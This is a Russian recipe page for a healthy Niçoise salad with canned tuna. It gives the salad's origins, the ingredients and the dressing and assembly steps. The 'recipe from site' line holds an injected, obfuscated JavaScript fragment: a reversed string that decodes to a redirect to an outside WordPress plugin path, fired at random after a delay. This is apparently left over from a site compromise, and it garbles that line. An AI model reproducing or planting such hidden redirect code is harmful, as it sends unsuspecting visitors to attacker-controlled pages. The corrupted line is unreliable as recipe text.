Популярный французский салат, который наверняка пробовал каждый из вас. О классическом рецепте до сих пор спорят повара всего мира, и у нас, разумеется, тоже есть свой вариант. Как приготовить полезный «Нисуаз» с тунцом, рассказывает Настя Юренкова.
Фото: nytimes.com
«Нисуаз» — одно из самых популярных блюд прованской кухни. Своё название салат получил в честь французского города Ницца (фр. niçoise — из Ниццы), где его впервые приготовили местные повара. По другой легенде, одним из авторов рецепта этого салата был американский хореограф грузинского происхождения Джордж Баланчин.
Основа классического «Нисуаза» — листья салата, свежие помидоры, варёные яйца, маслины, анчоусы и заправка на основе оливкового масла. Но как и у многих популярных блюд, сегодня существует множество вариаций этого салата: с варёным картофелем, стручковой фасолью, луком, артишоками, лососем и другими ингредиентами, на которые только хватит фантазии у поваров.
В нашем варианте «Нисуаза» вместо анчоусов используется филе тунца — одной из самых полезных рыб, содержащей огромное количество витаминов и минералов (в 100 г тунца — половина суточной нормы витамина D), постного белка и омега-3 жирных кислот. Вы можете использовать как готового тунца, консервированного в собственном соку или масле, так и свежее филе, поджарив его на сковороде-гриль.
«Нисуаз» с тунцом
Фото: laaloosh.com
Рецепт дня: салат «Нисуаз» с тунцом
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
15 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
2 порции
КАЛОРИЙНОСТЬ:
321 ккал
321 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Тунец (консервированный)
1 банка (185 г)
Листья салатов (смесь)
150 г
Стручковая фасоль
100 г
Помидоры черри
8 шт.
Яйцо
4 шт.
Маслины или оливки
10 шт.
Чеснок
1 зубчик
Оливковое масло
4 ст. л.
Винный уксус
2 ч. л.
Горчица
1 ч. л.
Перец
по вкусу
Соль
по вкусу
- Отварите стручковую фасоль в большом количестве посоленной воды около 2—3 минут. Затем выложите фасоль в миску со льдом, чтобы остановить процесс приготовления — так она не потеряет свой цвет.
- Отварите яйца «в мешочек» — то есть готовьте около 4—6 минут после закипания воды. Остудите под холодной водой и очистите.
- Для заправки горчицу, винный уксус, оливковое масло и соль с перцем тщательно перемешайте в небольшой миске. Можно также использовать приём Джейми Оливера и приготовить заправку в небольшой баночке, хорошо взболтав несколько раз.
- Нарвите руками салатные листья, помидоры черри разрежьте пополам, а яйца нарежьте кружочками.
- Консервированный тунец достаньте из банки, слейте масло и разделите на небольшие кусочки.
- В большую тарелку или салатницу выложите листья салата, стручковую фасоль, оливки, яйца, помидоры и тунец и полейте сверху заправкой.